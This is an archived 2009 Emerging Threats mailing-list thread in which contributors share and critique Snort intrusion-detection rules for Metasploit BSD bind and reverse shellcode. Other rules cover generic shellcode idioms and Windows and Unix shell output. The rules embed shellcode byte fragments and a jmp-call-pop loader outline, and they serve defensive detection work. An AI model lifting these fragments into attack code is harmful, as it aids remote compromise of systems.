>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666052;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12
>> bf
>> ff fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666053;
>> rev:5;)
>> #### EOF BSD SPARC Reverse Shell ####
>>
>>
>>
>>
>>
>>
>>
>> #
>> ### Shellcode develop patron by h0f JennyLab
>> # Alberto Garcia de Dios
>> # albertogdedios at andaluciajunta.es
>>
>>
>> # Alpha payload
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
>> shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
>> classtype:shellcode-detect; flow:established,to_server; distance:0;
>> sid:10666054; rev:5; nocase;)
>>
>>
>>
>>
>> # Call payload label and pop next bytes.
>>   #jmp short loader
>>   #label:
>>   #      code here
>>   #loader:
>>   # call label <--- here
>>   # db '/bin/bash'
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
>> shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
>> classtype:shellcode-detect; flow:established,to_server;
>> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666055;
>> rev:5;
>> nocase;)
>>
>>
>>
>>
>>
>> # xor eax, eax | xor ebx, ebx
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor detect";
>> content:"|31 c0 31 db|"; classtype:shellcode-detect;
>> flow:established,to_server;
>> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666056;
>> rev:5;
>> nocase;)
>>
>>
>>
>> # mov al, 0x01 | int 0x80
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit
>> syscall";
>> content:"|b0 01 cd 80|"; classtype:shellcode-detect;
>> flow:established,to_server;
>> reference:url,www.jennylab.org/codes/MultiString.opcode; sid:10666057;
>> rev:5;
>> nocase;)
>>
>>
>>
>> # pop ebx on call returned and two interruptions in 60 bytes.
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop and
>> interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
>> within:60; classtype:shellcode-detect; flow:established,to_server;
>> sid:10666058; rev:5;)
>>
>>
>> # pop ecx to use in interruption and before jmp to label data loader
>> # VMWare 2 server ( 8088 default port ) false positive.
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx and
>> call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
>> within:512; classtype:shellcode-detect; flow:established,to_server;
>> sid:10666059; rev:5;)
>>
>>
>> # three push ( bsd shellcodes use very match push ) | very much false
>> positive
>> on ssh and other services. use !$SSH_PORT ( before define var ).
>> #alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
>> content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12;
>> classtype:shellcode-detect; flow:established,to_server; sid:10666060;
>> rev:5;)
>>
>>
>> # xor all regs
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
>> registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
>> content:"|31 d2|"; distance:1; classtype:shellcode-detect;
>> flow:established,to_server;
>> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666061;
>> rev:5;
>> nocase;)
>>
>>
>>
>> #jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop (
>> multiple
>> exploits use).
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of
>> seh
>> win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
>> flow:established,to_server; sid:10666062; rev:5;)
>>
>>
>> # movl $0x01, %al | int 0x91
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit
>> Solaris.";
>> content:"|b0 01 cd 91|"; classtype:shellcode-detect;
>> flow:established,to_server; sid:106669063; rev:5; nocase;)
>>
>>
>>
>> #
>> # WINDOWS SHELL
>> #
>>
>> # C:\masm32> or C:\>
>> # *:\*>
>> #alert tcp any any -> any any (msg:"ET Windows shell execution 001";
>> pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
>> # \w\:\\.*\>
>> alert tcp any any -> any any (msg:"ET Windows shell execution 001";
>> pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)
>>
>>
>> # 12 dirs  83.453.632.512 bytes free
>> # * dirs * bytes *
>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
>> pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)
>>
>> # 2 Dir(s)  37.604.442.112 bytes free
>> # * Dir(s) * bytes *
>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
>> pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)
>>
>>
>> # 02/03/2009  23:51    <DIR>          masm32
>> # **/**/**** **:** <DIR> *
>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
>> pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092;
>> rev:1;)
>>
>>
>> # %systemroot%
>> alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25
>> 73
>> 79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1; nocase;)
>>
>>
>> # reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
>> alert tcp any any -> any any (msg:"ET Windows registry edit"; content:"reg
>> ";
>> pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import|flags).*/";
>> nocase; sid:966600094; rev:1;)
>>
>>
>>
>> #
>> # Unix shell
>> #
>>
>> # command >&0 <--- write on std with non create pipe shellcode
>> alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse
>> shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)
>>
>>
>> #Unix bash user and root ($ and #).
>> #h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
>> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
>> pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)
>>
>> #Unix sh and pure bash ($ and #)
>> # sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
>> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
>> pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)
>>
>>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>


_______________________________________________
Emerging-sigs mailing list
Emerging-sigs at emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


-- 

Mit besten Gr??en aus Kiel,



Markus Manzke


--------------------------------------------------------------------
MARE System Kiel  .:.   Monitoring - Security - ServerManagement
--------------------------------------------------------------------

Security & Emergency Online-Tools

  ::  Notfallkoffer / DONT PANIC First Aid Kit
      http://www.mare-system.de/emergency
  
  ::  Security Information Center                                    
      http://www.mare-system.de/sic

    
Mare System    -  Schweffelstr 8  -  24118 Kiel   
  ::  Notfall  :  01570 22 10 574
  ::  Office   :  0431 55 68 3480
  ::  Support  :  0431 55 68 3481
  ::  Fax      :  0431 55 68 3489
  ::  EMail    :  mail at mare-system.de
  ::  Web      :  http://www.mare-system.de
  ::  PubKey   :  http://mare-system.de/pubkey.php
            
              
*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*
*
*
*   o    \o/   _ o         __|     \ /    |__          o _    \o/
*  /|\    |     /\   __\o    \o     |    o/    o/__    /\      |
*  / \   / \   | \  /)  |    ( \   /o\  / )    |  (\   / |    / \
*
*
*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*'*


From jonkman at jonkmans.com  Tue Dec  1 14:22:56 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 14:22:56 -0500
Subject: [Emerging-Sigs] jennylab.rules
In-Reply-To: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
References: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
Message-ID: <91BC88EB-8E29-4C52-B593-8C377CCBC30D@jonkmans.com>

A few questions Alberto. Great sigs though, we appreciate the work you've put into these.

First, these. On 2010438 can we add a within to that? Otherwise this will false positive quite a bit.

On the rest, the strings matched are pretty small and are going to occur in normal traffic quite frequently. Can we anchor to something, or add more to the matches?


# Call payload label and pop next bytes.
 #jmp short loader
 #label:
 #      code here
 #loader:
 # call label <--- here
 # db '/bin/bash'
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET EXPLOIT Possible Alpha shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1; classtype:shellcode-detect; sid:2010438; rev:1;)

# xor eax, eax | xor ebx, ebx
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode xor detect"; content:"|31 c0 31 db|"; nocase; classtype:shellcode-detect; sid:2010439; rev:1;)

# mov al, 0x01 | int 0x80
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode exit syscall"; content:"|b0 01 cd 80|"; nocase; classtype:shellcode-detect; sid:2010440; rev:1;)

# pop ebx on call returned and two interruptions in 60 bytes.
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode ebx pop and interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|"; within:60; classtype:shellcode-detect; sid:2010441; rev:1; nocase;)

# pop ecx to use in interruption and before jmp to label data loader # VMWare
2 server ( 8088 default port ) false positive.
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode pop ecx and call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|"; within:512; classtype:shellcode-detect; sid:2010442; rev:1; nocase;)


# three push ( bsd shellcodes use very match push ) | very much false positive
on ssh and other services. use !$SSH_PORT ( before define var ).
#alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode push"; content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12; classtype:shellcode-detect; sid:2010443; rev:1; nocase;)


# xor all regs
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode xor all registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|"; content:"|31 d2|"; distance:1; classtype:shellcode-detect; sid:2010444; rev:1;
nocase;)



#jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop ( multiple
exploits use).
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode jmp out of seh win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect; sid:2010445; rev:1; nocase;)


# movl $0x01, %al | int 0x91
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET Shellcode exit Solaris."; content:"|b0 01 cd 91|"; classtype:shellcode-detect; sid:2010446; rev:1; nocase;)


Matt

On Nov 30, 2009, at 1:27 PM, Alberto Garcia de Dios wrote:

> Hello, I share my snort rules.
> 
> Metasploit patron ( all BSD and all filter for bsd type whitout generic unix
> shellcode ), my shellcodes patron and system patron.
> 
> 75 new rules.
> 
> 
> 
> 
> 
> # Metasploit BSD shellcode detect rules by h0f - Jennylab
> # Alberto Garcia de Dios
> # albertogdedios at andaluciajunta.es
> # http://www.jennylab.org
> 
> 
> 
> #
> #
> #####
> # METASPLOIT SHELLCODE RULES
> #####
> #
> #
> 
> 
> #
> # BSD METASPLOIT RULES
> #
> 
> 
> #### BSD BIND SHELL #######
> # BSD Bind Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666001; rev:5;)
> 
> 
> # BSD Bind Shell - ENCODE: CountDown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e 7 e2 fa 6b
> 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect; sid:666003; rev:5;) alert
> ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD
> Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48 71 74
> 45 d3|"; classtype:shellcode-detect; sid:666004; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f 77 45
> 6a 69 63|"; classtype:shellcode-detect; sid:666005; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e 20 2a
> 2a cc a5|"; classtype:shellcode-detect; sid:666006; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
> classtype:shellcode-detect; sid:666007; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; sid:666008; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> sid:666009; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
> classtype:shellcode-detect; sid:666010; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52 6a
> 68 58 cd|"; classtype:shellcode-detect; sid:666011; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02 59 6a
> 5a 58 51|"; classtype:shellcode-detect; sid:666012; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3|"; classtype:shellcode-detect; sid:666013; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
> classtype:shellcode-detect; sid:666014; rev:5;)
> 
> 
> 
> #BSD Bind Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49 49 49
> 51 5a 56|"; classtype:shellcode-detect; sid:666015; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30 42 33
> 30 42 43|"; classtype:shellcode-detect; sid:666016; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54 42
> 44 51 42|"; classtype:shellcode-detect; sid:666017; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c 36
> 41|"; classtype:shellcode-detect; sid:666018; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 4e 44 35 44 34 44|"; classtype:shellcode-detect;
> sid:666019; rev:5;)
> 
> 
> 
> #BSD Bind Shell - ENCODE: PexFstEnvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666020; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666021; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef ff
> ff ff|"; classtype:shellcode-detect; sid:666022; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49 49 49
> 49 49 49|"; classtype:shellcode-detect; sid:666023; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
> classtype:shellcode-detect; sid:666024; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|"; classtype:shellcode-detect;
> sid:666025; rev:5;)
> #### EOF BSD BIND SHELL ######
> 
> 
> 
> 
> 
> ### BSD REVERSE SHELL #######
> #BSD Reverse Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666026; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666027; rev:5;)
> 
> 
> #BSD Reverse Shell - ENCODE: Countdown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07 e2 fa
> 6b 63 5b 9d|"; classtype:shellcode-detect; sid:666028; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49 26 7c
> 96 7d 79 7e|"; classtype:shellcode-detect; sid:666029; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18 5a 50
> 54 b2 df 6d|"; classtype:shellcode-detect; sid:666030; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|57 44 55 4a 5b 62|"; classtype:shellcode-detect;
> sid:666031; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; sid:666032; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> sid:666033; rev:5;)
> 
> 
> #BSD Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3 50|"; classtype:shellcode-detect; sid:666034; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
> classtype:shellcode-detect; sid:666035; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a 02 59
> b0 5a 51 57|"; classtype:shellcode-detect; sid:666036; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41 4e 4f
> 49 38 41 4e|"; classtype:shellcode-detect; sid:666037; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36 44 56
> 4a 35 4d 4c|"; classtype:shellcode-detect; sid:666038; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54
> 42 44 51 42|"; classtype:shellcode-detect; sid:666039; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: PexFnstenvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666040; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666041; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef
> ff ff ff|"; classtype:shellcode-detect; sid:666042; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
> classtype:shellcode-detect; sid:666043; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
> classtype:shellcode-detect; sid:666044; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
> classtype:shellcode-detect; sid:666045; rev:5;)
> ##### EOF BSD Reverse Shell#####
> 
> 
> 
> 
> ##### BSD SPARC Bind Shell #########
> #BSD SPARC Bind Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03 e0
> 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666046; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff
> fb 9e 03 e0 04|"; classtype:shellcode-detect; sid:666047; rev:5;)
> 
> 
> #BSD SPARC Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10 20
> 10 82 10 20 68|"; classtype:shellcode-detect; sid:666048; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10 20
> 6a 91 d0 20 08|"; classtype:shellcode-detect; sid:666049; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10 20
> 1e 91 d0 20 08|"; classtype:shellcode-detect; sid:666050; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf
> f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:666051; rev:5;)
> #### EOF BSD SPARC Bind Shell #########
> 
> 
> ### BSD SPARC Reverse Shell ########
> #BSD SPARC Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01 90 10
> 20 02 82 10 20 61|"; classtype:shellcode-detect; sid:666052; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2 60 01 82
> 10 20 5a|"; classtype:shellcode-detect; sid:666053; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21 3f c0|";
> classtype:shellcode-detect; sid:666054; rev:5;)
> 
> #BSD SPARC Reverse Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03
> e0 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666055; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff fb 9e
> 03 e0 04|"; classtype:shellcode-detect; sid:666056; rev:5;) #### EOF BSD SPARC
> Reverse Shell ####
> 
> 
> 
> 
> 
> 
> 
> #
> ### Shellcode develop patron by h0f JennyLab
> # Alberto Garcia de Dios
> # albertogdedios at andaluciajunta.es
> 
> 
> # Alpha payload
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
> classtype:shellcode-detect; sid:666900; rev:5; nocase;)
> 
> 
> 
> 
> # Call payload label and pop next bytes.
>  #jmp short loader
>  #label:
>  #      code here
>  #loader:
>  # call label <--- here
>  # db '/bin/bash'
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
> classtype:shellcode-detect; sid:666901; rev:5; nocase;)
> 
> 
> 
> 
> 
> # xor eax, eax | xor ebx, ebx
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor detect";
> content:"|31 c0 31 db|"; classtype:shellcode-detect; sid:666902; rev:5;
> nocase;)
> 
> 
> 
> # mov al, 0x01 | int 0x80
